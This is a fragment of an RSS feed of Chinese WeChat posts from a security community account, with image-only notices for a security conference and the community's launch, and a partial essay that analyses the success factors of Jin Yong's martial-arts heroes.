<span>TLG潜龙会</span> <span>2024-11-05 20:02</span> <span style="display: inline-block;">北京</span>
</p>

<p>ADConf，专注于实战攻防技术；ADConf2024聚焦“Al+安全”。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=f5ba5186&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtIFTz12c3Uk2E9U2lQw15uNecQRPW6I29DIGvVaiafich9y3iaE7C6OHDwwibYNaTGI27Ct20kosjkiciaQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="text-align: center;margin-bottom: 0px;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000461" data-ratio="1.3111111111111111" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=4478f781&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIFTz12c3Uk2E9U2lQw15uNm9YBAHJ4Res3dVWiaBIgco6km8pUw7lGY7xRIRQXhNf8Q9NRkPY8xVQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></section><p style="text-align: center;margin-bottom: 0px;line-height: normal;margin-top: 0px;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000465" data-ratio="1.5703703703703704" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=04e72487&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIFTz12c3Uk2E9U2lQw15uNUoGIEeNFCzOdI1oJJkgNwcesNVGthel56LTXsKbkPMeMjZO9hDfXkg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><section style="text-align: center;line-height: normal;margin-bottom: 0px;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000466" data-ratio="1.3231481481481482" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=bcaa7ce3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIFTz12c3Uk2E9U2lQw15uNOBgEetopTlyU6LUUIJA1EWcLq2msq1fUFmNgaZ89x0NzXe7bB0MVRQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></section><section style="text-align: center;margin-bottom: 0px;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000467" data-ratio="1.5296296296296297" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=aeff0187&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIFTz12c3Uk2E9U2lQw15uNwXUQS1my4TKQv2lz4K3CbRCstWodWxibuPFCebPKSDKNXfy9od2MXCw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></section><section style="text-align: center;margin-bottom: 0px;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000468" data-ratio="0.6685185185185185" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=6d4da1a2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIFTz12c3Uk2E9U2lQw15uNNKrNwhCcpriaFZhvJ1NSUbfgtLPTYFJOc6j7o5mXAaIXVHJ024TUDzw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000469" data-ratio="1.461111111111111" data-s="300,640" style="" data-type="jpeg" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=7e767e23&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtIFTz12c3Uk2E9U2lQw15uNqiapD2y8RRR4UBJsffDxqqCdnm6ZCiaOGbeU8akpnRDBQtCLHJq7C5aQ%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p style="margin-bottom: 0px;line-height: normal;"><br/></p><p style="text-align: center;"><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484126">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=7eb58e1e&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247484126%26idx%3D1%26sn%3D26777d2b86c945f020ad36bd00a3f65b%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 05 Nov 2024 20:02:00 +0800</pubDate>
    </item>
    <item>
      <title>TLG潜龙会正式成立：攻防共创新境界，技术聚能共前行</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247484096&amp;idx=1&amp;sn=93d935cb972e55dd95110fc9f821372b</link>
      <description>TLG潜龙会正式成立：攻防共创新境界，技术聚能共前行</description>
      <content:encoded><![CDATA[<p>
<span>程远ing</span> <span>2024-06-18 22:54</span> <span style="display: inline-block;">北京</span>
</p>

<p>TLG潜龙会正式成立：攻防共创新境界，技术聚能共前行</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=6f19d91a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtI0dkKW1lMnkD7HyibfJ2OWqKicfugcgia17SsOlpzAcEPt5EgtUWwDh4iaVqKZ20yTJIkUGeRM3zd3nQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section><video controls="" poster="https://wechat2rss.xlab.app/img-proxy/?k=fc2f9f52&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Fe8SRZGrAicfzYK8hRr20RibMtibjQOWnzMzqiapntm2npM6iazeMKiad0YUsSSXk9NQtwORICicxiaibwnpREmFDnXCq2yA%2F0%3Fwx_fmt%3Djpeg" src="https://wechat2rss.xlab.app/video-proxy/?k=a8755561&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247484096%26idx%3D1%26sn%3D93d935cb972e55dd95110fc9f821372b%26subscene%3D0&amp;v=wxv_3507020698734886915"></video></section><section><br/></section><section><span style="letter-spacing: 0.578px;text-wrap: wrap;"></span></section><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-imgfileid="100000444" data-ratio="11.29351851851852" data-s="300,640" style="" data-type="jpeg" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=32245192&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtI0dkKW1lMnkD7HyibfJ2OWq9reichWpLM3LmS40zqIcfjYYHicPRR9jDNDZZZgg7tAN7pl2mIbYky2A%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><section><span style="letter-spacing: 0.578px;text-wrap: wrap;">TLG潜龙会官方公众号</span></section><section class="mp_profile_iframe_wrp"><mp-common-profile class="js_uneditable custom_select_card mp_profile_iframe" data-pluginname="mpprofile" data-id="MzkwNTcwMzAxMQ==" data-headimg="http://mmbiz.qpic.cn/sz_mmbiz_png/e8SRZGrAicfzhKKrXUtKptZW2GYSweWIVic3PhMIl1QjRdsedCFhiaTicDnaVDnBxYTHDYjmS7dly6aJlhlbbyJkwA/0?wx_fmt=png" data-nickname="TLG潜龙会" data-alias="Tlgclub" data-signature="汇聚网络安全领域的顶尖专家和技术爱好者，以开放、合作、分享的理念为指引，共同推动网络安全领域的发展与创新。" data-from="0" data-is_biz_ban="0"></mp-common-profile></section><section><span style="letter-spacing: 0.578px;text-wrap: wrap;"></span></section><section><br/></section><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484096">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=0ae740a0&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247484096%26idx%3D1%26sn%3D93d935cb972e55dd95110fc9f821372b%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 18 Jun 2024 22:54:00 +0800</pubDate>
    </item>
    <item>
      <title>金庸武侠-非线性理解的屌丝逆袭</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247484090&amp;idx=1&amp;sn=0f7a105c1b221d0e3d2a496b6135598c</link>
      <description>非线性理解武侠主角的屌丝逆袭：（家族、圈层、老师、天赋、努力）—— 认清形势、放弃幻想。</description>
      <content:encoded><![CDATA[<p>
原创 <span>程远ing</span> <span>2024-05-02 07:26</span> <span style="display: inline-block;">河北</span>
</p>

<p>非线性理解武侠主角的屌丝逆袭：（家族、圈层、老师、天赋、努力）—— 认清形势、放弃幻想。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=c9dafc1d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtKl6SwW8LhtrTXcSE0AGN7YM4icdicoRW2EJ8Fg8vZcbBOqv11QreEcCBrTIhGu9icvJmZ6DafYnbibpA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-justify: inter-ideograph;mso-font-kerning: 1.0pt;mso-style-name: &#39;p1&#39;;margin-top: 0.0pt;margin-bottom: 0.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 20.0pt;font-family: pingfang sc semibold;mso-fareast-font-family: &#39;pingfang sc semibold&#39;;mso-bidi-font-family: pingfang sc semibold;font-weight: normal;mso-bidi-font-weight: normal;mso-pagination: widow-orphan;page-break-after: auto;"><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">前段时间，金庸诞辰100周年，北大有个煮酒论剑活动（</span><a href="https://mp.weixin.qq.com/s?__biz=MzA3OTE0MjQzMw==&amp;mid=2651975462&amp;idx=1&amp;sn=825dbfca85ac62cd401060d330ff9199&amp;scene=21#wechat_redirect" data-linktype="2" style="text-indent: 0pt;font-family: Calibri;font-size: 12pt;letter-spacing: 0.034em;"><span style="font-size: 13pt;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">在北大，重温百年金庸</span></a><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">），当时有个分享，五一假期归档。</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000441" data-ratio="0.5092592592592593" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=e1e7446a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKl6SwW8LhtrTXcSE0AGN7Ye4tW6kibE6wcvryfxRIwAA1OhzzVD1uGItyHFmGzRLcJAic5JSEJwvJw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><span style="font-family: &#34;Helvetica Neue&#34;;font-size: 13pt;text-align: left;text-indent: 0pt;letter-spacing: 0.034em;"></span></p><p style="text-justify: inter-ideograph;mso-font-kerning: 1.0pt;mso-style-name: &#39;p2&#39;;margin-top: 0.0pt;margin-bottom: 0.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 13.0pt;font-family: Helvetica Neue;mso-fareast-font-family: &#39;Helvetica Neue&#39;;mso-bidi-font-family: Helvetica Neue;font-weight: normal;mso-bidi-font-weight: normal;mso-pagination: widow-orphan;page-break-after: auto;"><span style="font-family:Helvetica Neue;mso-ascii-font-family:Helvetica Neue;mso-fareast-font-family:Helvetica Neue;font-variant:normal;text-transform:none;">          <o:p> </o:p></span></p><p style="margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Calibri;mso-fareast-font-family: &#39;宋体&#39;;mso-font-kerning: 1.0pt;font-weight: normal;mso-bidi-font-weight: normal;margin-top: 0.0pt;margin-right: 0.0pt;margin-bottom: 0.0pt;text-align: justify;text-justify: inter-ideograph;mso-pagination: widow-orphan;page-break-after: auto;tab-stops: left Blank 36.0pt;"><span style="font-size:13.0pt;mso-bidi-font-size:13.0pt;font-family:宋体;mso-ascii-font-family:Helvetica Neue;mso-bidi-font-family:Helvetica Neue;font-variant:normal;text-transform:none;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;font-weight:normal;mso-bidi-font-weight:normal;">武侠小说甚至小说，好多都跟“屌丝逆袭”做了一定的线性关联，以下通过五点（家族、圈层、老师、天赋、努力）分析下金庸作品主角的“屌丝逆袭”之路。</span></p><p style="text-justify: inter-ideograph;mso-font-kerning: 1.0pt;mso-style-name: &#39;p2&#39;;margin-top: 0.0pt;margin-bottom: 0.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 13.0pt;font-family: Helvetica Neue;mso-fareast-font-family: &#39;Helvetica Neue&#39;;mso-bidi-font-family: Helvetica Neue;font-weight: normal;mso-bidi-font-weight: normal;mso-pagination: widow-orphan;page-break-after: auto;"><br/></p><p style="text-justify: inter-ideograph;mso-font-kerning: 1.0pt;mso-style-name: &#39;p2&#39;;margin-top: 0.0pt;margin-bottom: 0.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 13.0pt;font-family: Helvetica Neue;mso-fareast-font-family: &#39;Helvetica Neue&#39;;mso-bidi-font-family: Helvetica Neue;font-weight: normal;mso-bidi-font-weight: normal;mso-pagination: widow-orphan;page-break-after: auto;"><br/></p><p style="text-justify: inter-ideograph;mso-font-kerning: 1.0pt;mso-style-name: &#39;p2&#39;;margin-top: 0.0pt;margin-bottom: 0.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 13.0pt;font-family: Helvetica Neue;mso-fareast-font-family: &#39;Helvetica Neue&#39;;mso-bidi-font-family: Helvetica Neue;font-weight: normal;mso-bidi-font-weight: normal;mso-pagination: widow-orphan;page-break-after: auto;"><span style="font-size: 12pt;text-align: justify;text-indent: 0pt;letter-spacing: 0.034em;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">1. <span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-variant-position: normal;font-stretch: normal;font-size: 7pt;line-height: normal;font-family: &#34;Times New Roman&#34;;"></span></span><strong><span style="text-align: justify;text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: 宋体;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(251, 2, 7);">家族</span><span style="text-align: justify;text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(251, 2, 7);">背景</span></strong><span style="text-align: justify;text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">，主角大部分算是名门之后…  即使他亲爹不行，他当时的门派也是名门大派</span><span style="text-align: justify;text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: 宋体;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">（</span><span style="text-align: justify;text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: 宋体;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">武学顶流</span><span style="text-align: justify;text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: 宋体;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">）</span><span style="text-align: justify;text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">。有点类似富二代，这个“富”不一定是金钱的富，更多的是有配套的资源。例如郭靖来内陆</span><span style="text-align: justify;text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: 宋体;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">前</span><span style="text-align: justify;text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">第一手人脉资源蒙古贵族，陈家洛&amp;袁承志都是官二代</span><span style="text-align: justify;text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: 宋体;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">（</span><span style="text-align: justify;text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: 宋体;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">袁承志他爹的旧部组建的山宗帮助他寻找名师...</span><span style="text-align: justify;text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: 宋体;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">）</span><span style="text-align: justify;text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">，张无忌孤苦但家世背景是武当派... </span><span style="text-align: justify;text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: 宋体;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">。【</span><span style="text-align: justify;text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: 宋体;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;font-style: italic;">可参考红尘之眼的《</span><a href="https://mp.weixin.qq.com/s?__biz=MzU3OTg2ODEyOQ==&amp;mid=2247487910&amp;idx=1&amp;sn=0fd5bb866947c6e2a1dd70439e32e72e&amp;scene=21#wechat_redirect" style="font-family: Calibri;font-size: 12pt;text-align: justify;text-indent: 0pt;letter-spacing: 0.034em;" data-linktype="2"><span style="font-size: 13pt;font-family: 宋体;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;font-style: italic;">没有家族力量的托举，谁都是普通人</span></a><span style="text-align: justify;text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: 宋体;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;font-style: italic;">》</span><span style="text-align: justify;text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: 宋体;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">】</span><span style="text-align: justify;text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"></span><span style="font-family: Calibri;font-size: 12pt;text-align: justify;text-indent: 0pt;letter-spacing: 0.034em;">    </span></p><p style="text-justify: inter-ideograph;mso-font-kerning: 1.0pt;mso-style-name: &#39;p2&#39;;margin-top: 0.0pt;margin-bottom: 0.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 13.0pt;font-family: Helvetica Neue;mso-fareast-font-family: &#39;Helvetica Neue&#39;;mso-bidi-font-family: Helvetica Neue;font-weight: normal;mso-bidi-font-weight: normal;mso-pagination: widow-orphan;page-break-after: auto;"><br/></p><p style="text-align: justify;text-justify: inter-ideograph;line-height: normal;font-size: 12.0pt;font-family: Calibri;mso-fareast-font-family: &#39;宋体&#39;;mso-font-kerning: 1.0pt;font-weight: normal;mso-bidi-font-weight: normal;mso-list: l0 level1 lfo1;margin-top: 0.0pt;margin-right: 0.0pt;margin-bottom: 0.0pt;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;page-break-after: auto;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Helvetica Neue;mso-ascii-font-family:Helvetica Neue;mso-fareast-font-family:Helvetica Neue;mso-bidi-font-family:Helvetica Neue;font-variant:normal;text-transform:none;font-weight:normal;mso-bidi-font-weight:normal;">2. </span><span style="font-size:13.0pt;mso-bidi-font-size:13.0pt;font-family:宋体;mso-ascii-font-family:Helvetica Neue;mso-bidi-font-family:Helvetica Neue;font-variant:normal;text-transform:none;color:#FB0207;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;font-weight:normal;mso-bidi-font-weight:normal;">门派/</span><span style="font-size:13.0pt;mso-bidi-font-size:13.0pt;font-family:Helvetica Neue;mso-ascii-font-family:Helvetica Neue;mso-bidi-font-family:Helvetica Neue;font-variant:normal;text-transform:none;color:#FB0207;font-weight:normal;mso-bidi-font-weight:normal;">圈层</span><span style="font-size: 13pt;font-family: &#34;Helvetica Neue&#34;;font-variant: normal;text-transform: none;font-weight: normal;color: rgb(0, 0, 0);"> ，</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 0);">大部分主角的底色都是</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">名门大派。  例如倚天的武当派，笑傲江湖的华山派，就跟现在的清华北大一个级别。</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: 宋体;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">后期的郭靖也创造了他自己的圈层“郭靖世家”（附图）；现在一些大佬也是借力</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">圈层的</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: 宋体;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">力量</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">，包括学校、派系、家族宗亲等（做生意的</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: 宋体;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">也</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">有广东商邦、山西晋商...）。</span></p><p style="text-align: justify;text-justify: inter-ideograph;line-height: normal;font-size: 12.0pt;font-family: Calibri;mso-fareast-font-family: &#39;宋体&#39;;mso-font-kerning: 1.0pt;font-weight: normal;mso-bidi-font-weight: normal;mso-list: l0 level1 lfo1;margin-top: 0.0pt;margin-right: 0.0pt;margin-bottom: 0.0pt;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;page-break-after: auto;"><br/></p><p style="text-align: justify;text-justify: inter-ideograph;line-height: normal;font-size: 12.0pt;font-family: Calibri;mso-fareast-font-family: &#39;宋体&#39;;mso-font-kerning: 1.0pt;font-weight: normal;mso-bidi-font-weight: normal;mso-list: l0 level1 lfo1;margin-top: 0.0pt;margin-right: 0.0pt;margin-bottom: 0.0pt;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;page-break-after: auto;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Helvetica Neue;mso-ascii-font-family:Helvetica Neue;mso-fareast-font-family:Helvetica Neue;mso-bidi-font-family:Helvetica Neue;font-variant:normal;text-transform:none;font-weight:normal;mso-bidi-font-weight:normal;">3. <span style="font:7.0pt Times New Roman;"></span></span><strong><span style="font-size:13.0pt;mso-bidi-font-size:13.0pt;font-family:Helvetica Neue;mso-ascii-font-family:Helvetica Neue;mso-bidi-font-family:Helvetica Neue;font-variant:normal;text-transform:none;color:#FB0207;font-weight:normal;mso-bidi-font-weight:normal;">导师/老</span><span style="font-size:13.0pt;mso-bidi-font-size:13.0pt;font-family:Helvetica Neue;mso-ascii-font-family:Helvetica Neue;mso-bidi-font-family:Helvetica Neue;font-variant:normal;text-transform:none;color:#FB0207;font-weight:normal;mso-bidi-font-weight:normal;">师</span></strong><span style="font-size:13.0pt;mso-bidi-font-size:13.0pt;font-family:Helvetica Neue;mso-ascii-font-family:Helvetica Neue;mso-bidi-font-family:Helvetica Neue;font-variant:normal;text-transform:none;font-weight:normal;mso-bidi-font-weight:normal;">，主角的老师几乎都是顶级的</span><span style="font-size:13.0pt;mso-bidi-font-size:13.0pt;font-family:宋体;mso-ascii-font-family:Helvetica Neue;mso-bidi-font-family:Helvetica Neue;font-variant:normal;text-transform:none;mso-fareast-language:ZH-CN;font-weight:normal;mso-bidi-font-weight:normal;">（</span><span style="font-size:13.0pt;mso-bidi-font-size:13.0pt;font-family:宋体;mso-ascii-font-family:Helvetica Neue;mso-bidi-font-family:Helvetica Neue;font-variant:normal;text-transform:none;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;font-weight:normal;mso-bidi-font-weight:normal;">名师指路，贵人相助</span><span style="font-size:13.0pt;mso-bidi-font-size:13.0pt;font-family:宋体;mso-ascii-font-family:Helvetica Neue;mso-bidi-font-family:Helvetica Neue;font-variant:normal;text-transform:none;mso-fareast-language:ZH-CN;font-weight:normal;mso-bidi-font-weight:normal;">）， 陈家洛的老师袁士霄天下第一、袁承志的老师（师父）穆人清天下第一、令狐冲的拔高型老师风清扬几乎天下第一、张无忌的导师张三丰几乎天下第一、郭靖的</span><span style="font-size:13.0pt;mso-bidi-font-size:13.0pt;font-family:宋体;mso-ascii-font-family:Helvetica Neue;mso-bidi-font-family:Helvetica Neue;font-variant:normal;text-transform:none;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;font-weight:normal;mso-bidi-font-weight:normal;">武功大成的老师</span><span style="font-size:13.0pt;mso-bidi-font-size:13.0pt;font-family:Helvetica Neue;mso-ascii-font-family:Helvetica Neue;mso-bidi-font-family:Helvetica Neue;font-variant:normal;text-transform:none;font-weight:normal;mso-bidi-font-weight:normal;">几乎都是全国前五（降龙十八掌-洪七公，九阴真经-周伯通）、杨过都受到过五绝和金轮的点播提携... </span><span style="font-size:13.0pt;mso-bidi-font-size:13.0pt;font-family:宋体;mso-ascii-font-family:Helvetica Neue;mso-bidi-font-family:Helvetica Neue;font-variant:normal;text-transform:none;mso-fareast-language:ZH-CN;font-weight:normal;mso-bidi-font-weight:normal;">。</span><span style="font-size:13.0pt;mso-bidi-font-size:13.0pt;font-family:Helvetica Neue;mso-ascii-font-family:Helvetica Neue;mso-bidi-font-family:Helvetica Neue;font-variant:normal;text-transform:none;font-weight:normal;mso-bidi-font-weight:normal;">早年家 一些尖端领域都是要拜师学艺的（黑客技术，早年间没有科班和正式职业，求学也是拜师）包括现在，每个细分领域找到大师 才有可能达到大师水平（例如金庸的围棋老师陈祖德、聂卫平，都是顶级大佬）。类似现在挤破脑袋也要上名校（学区房）一个逻辑【主要目的还是通过名校提升名师的概率以及增大成才的概率】</span></p><p style="text-align: justify;text-justify: inter-ideograph;line-height: normal;font-size: 12.0pt;font-family: Calibri;mso-fareast-font-family: &#39;宋体&#39;;mso-font-kerning: 1.0pt;font-weight: normal;mso-bidi-font-weight: normal;mso-list: l0 level1 lfo1;margin-top: 0.0pt;margin-right: 0.0pt;margin-bottom: 0.0pt;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;page-break-after: auto;"><span style="font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><br/></span></p><p style="text-align: justify;text-justify: inter-ideograph;line-height: normal;font-size: 12.0pt;font-family: Calibri;mso-fareast-font-family: &#39;宋体&#39;;mso-font-kerning: 1.0pt;font-weight: normal;mso-bidi-font-weight: normal;mso-list: l0 level1 lfo1;margin-top: 0.0pt;margin-right: 0.0pt;margin-bottom: 0.0pt;margin-left: 0.0pt;text-indent: 0.0pt;mso-pagination: widow-orphan;page-break-after: auto;"><span style="font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">4. </span><strong><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 13pt;font-family: &#34;Helvetica Neue&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(251, 2, 7);">个人天赋</span></strong><span style="text-indent: 0pt;letter-spacing: 